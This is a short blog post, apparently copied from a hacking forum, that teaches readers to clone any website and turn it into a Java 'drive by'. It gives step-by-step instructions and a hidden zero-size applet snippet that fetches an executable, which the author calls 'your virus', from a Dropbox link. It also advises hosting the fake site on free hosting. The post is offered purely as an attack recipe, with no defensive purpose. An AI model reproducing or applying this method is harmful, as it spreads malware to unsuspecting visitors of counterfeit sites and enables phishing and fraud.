Saturday, February 25, 2017

How To Clone Any Site And Turn It Into A Java Drive By !

2:29 PM Leave a Reply
Once Downloaded you will need to extract it with a unzipping program such as 7 ZIP or Win Rar etc.

1. Find the website you would like to clone. (Use Google Chrome For This!)

2. Once your on the site, Right Click and click "Save As" and then put into the folder you have just extracted in the same folder as "client.jar"

3. Rename the file you got from the website you just saved to "index"

Pictures of this story:








4. Right click on index.html and press open with -> Notepad

5. Now you should see all the code for the website, scroll to the bottom of the text and make a few spaces and put the code in below.



Code:
<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "https://www.yoursite.com/yourprogram.exe">
</APPLET>

Where it says yoursite.exe, you need to put a direct link to your file so upload your virus to: https://www.dropbox.com/ and then add the direct link to the applet code.

6. Save your website in notepad by pressing either CTR + S or File-> Save.

Pictures of the story:








You have now successfully created a working java drive by, when you open the index page it should look like this:



Now you need to upload it to a web site so you are going to need a domain + hosting

Free hosting that doesn't delete your site: https://www.freehosting.com (I host mine their)


 Read More at :https://leakninja.com/hacking-and-security-tutorials/3299-clone-site-java-drive.html

0 comments :